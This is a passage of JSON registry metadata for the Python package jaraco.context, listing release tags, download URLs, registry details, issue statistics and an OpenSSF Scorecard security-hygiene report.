6ef1981f5ca7a7309ed4d3005","kind":"tag","published_at":"2024-07-26T21:08:04.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.0/manifests"},{"name":"v5.3.0","sha":"e0e9224b3dbe6520c986bf41820f882160dd55ab","kind":"tag","published_at":"2024-04-06T22:57:11.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.3.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.3.0/manifests"},{"name":"v5.2.0","sha":"c23c888c869bfb693246f69ba512aaede5b0438b","kind":"tag","published_at":"2024-04-06T14:42:52.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"0a1e1492aef2455f60f9b4f364551f0b4926da41","kind":"tag","published_at":"2024-04-04T23:18:01.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"eb865a132d3f801335f8b46b4de2d64d4e16e4b4","kind":"tag","published_at":"2024-04-04T18:56:02.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.0.0/manifests"},{"name":"v4.3.0","sha":"0e0ae08919b984e3c7cffdb2106e437d0d0891c8","kind":"tag","published_at":"2023-01-19T15:28:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.3.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.3.0/manifests"},{"name":"v4.2.1","sha":"7e22446a66f13140c0cfc7df3f36c162f11f3b5a","kind":"tag","published_at":"2023-01-18T18:06:43.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.2.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.1/manifests"},{"name":"v4.2.0","sha":"5bf0042ef434aa8924a771a405ae29e4c0110c1e","kind":"tag","published_at":"2022-11-19T03:06:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.0/manifests"},{"name":"v4.1.2","sha":"c3a9b7393ed9479dab7b02a44242ae2b017c4933","kind":"tag","published_at":"2022-07-14T05:04:26.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"4d09b48ade8acc32e3453da928ad1eec5158a5a0","kind":"tag","published_at":"2021-10-31T17:18:09.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"866a1b35d416ca6855f2d068072af53cbf255cc3","kind":"tag","published_at":"2021-10-31T17:08:46.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.0/manifests"},{"name":"v4.0.0","sha":"23d17bf1f04b83ef34c8cd0e67d26c2e323f5a58","kind":"tag","published_at":"2021-01-29T02:38:28.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.0.0/manifests"},{"name":"v3.0.0","sha":"e2bb8bd3fe8b3b3ed4a50c4a9f4f1998739bf276","kind":"tag","published_at":"2020-01-10T08:35:45.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v3.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v3.0.0/manifests"},{"name":"2.0","sha":"105f81a6204d3a9fbb848675d62be4ef185f36f2","kind":"tag","published_at":"2019-01-01T15:40:50.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/2.0/manifests"},{"name":"1.8","sha":"193b5a60581b5a63c3d955e002319f114f9a7c8b","kind":"tag","published_at":"2018-11-08T16:42:27.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.8","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.8/manifests"},{"name":"1.7","sha":"d7866113d8d79a541c1f87e2eae975d23d2500ba","kind":"tag","published_at":"2017-11-28T19:27:39.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.7","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.7/manifests"},{"name":"1.6.1","sha":"94f59b63bd5b2f634f0f8061402a884e108153fa","kind":"tag","published_at":"2017-03-21T03:32:35.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.6.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6.1/manifests"},{"name":"1.6","sha":"94f59b63bd5b2f634f0f8061402a884e108153fa","kind":"tag","published_at":"2017-03-21T03:19:34.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.6","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6/manifests"},{"name":"1.5.2","sha":"9660d84625f7d27f47f23bd33a1e88c6c59c5384","kind":"commit","published_at":"2015-10-30T15:02:08.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.2/manifests"},{"name":"1.5.1","sha":"51add8c320bb1869d339ddb5d3e0b0df5185b431","kind":"commit","published_at":"2015-10-30T15:02:04.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.1/manifests"},{"name":"1.5","sha":"df1e66e6ff30ee0622b1eb822a4d2ba1663b4ba5","kind":"commit","published_at":"2015-10-30T13:32:37.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5/manifests"},{"name":"1.4","sha":"41a57fcc069952a9925b0ac44d66317d679b8e01","kind":"commit","published_at":"2015-10-30T12:59:05.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.4","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.4/manifests"},{"name":"1.3","sha":"89a04a5a4b02f92546eb2bc2bd254dabbd148359","kind":"commit","published_at":"2015-02-22T20:18:53.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.3","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.3/manifests"},{"name":"1.2","sha":"a3363e1918bab3d2b260179f229706296509c1c0","kind":"commit","published_at":"2015-02-16T00:58:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.2/manifests"},{"name":"1.1","sha":"115a8978616e766daace2e0cd50c5db437f3785e","kind":"commit","published_at":"2014-06-17T18:32:26.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.1/manifests"},{"name":"1.0","sha":"d5be3e1a933b97068f31930f3eeb210895d145e9","kind":"commit","published_at":"2014-02-16T08:42:48.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.0/manifests"}]},"repo_metadata_updated_at":"2026-08-06T19:26:18.545Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":9.345852080216646,"dependent_packages_count":6.999148183520997,"stargazers_count":null,"forks_count":null,"average":8.172500131868823},"purl":"pkg:golang/github.com/jaraco/jaraco.context","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/jaraco/jaraco.context","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/jaraco/jaraco.context","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/jaraco/jaraco.context/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context","https://github.com/sponsors/jaraco"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fjaraco%2Fjaraco.context/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fjaraco%2Fjaraco.context/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fjaraco%2Fjaraco.context/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fjaraco%2Fjaraco.context/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fjaraco%2Fjaraco.context/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fjaraco%2Fjaraco.context/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2281915,"maintainers_count":0,"namespaces_count":839487,"keywords_count":124977,"github":"golang","metadata":{"funded_packages_count":67925,"sync_missing_packages_cursor":{"timestamp":"2026-08-17T00:00:58.969562Z","path":"github.com/Tektoncd/operator","version":"v0.78.0"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-08-24T05:01:22.286Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":2771936,"name":"jaraco.context","ecosystem":"pypi","description":"Useful decorators and context managers","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":[],"namespace":null,"versions_count":31,"first_release_published_at":"2014-02-16T09:00:53.000Z","latest_release_published_at":"2026-03-20T22:13:32.000Z","latest_release_number":"6.1.2","last_synced_at":"2026-08-24T13:14:46.382Z","created_at":"2022-04-10T11:21:13.187Z","updated_at":"2026-08-24T17:59:26.936Z","registry_url":"https://pypi.org/project/jaraco.context/","install_command":"pip install jaraco.context --index-url https://pypi.org/simple","documentation_url":"https://jaraco.context.readthedocs.io/","metadata":{"funding":null,"documentation":null,"classifiers":["Development Status :: 5 - Production/Stable","Intended Audience :: Developers","Programming Language :: Python :: 3","Programming Language :: Python :: 3 :: Only"],"normalized_name":"jaraco-context","project_status":null},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":7,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-08-14T10:54:24.131Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":null,"gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2026-08-06T04:43:36.220Z","dependency_job_id":null,"html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection 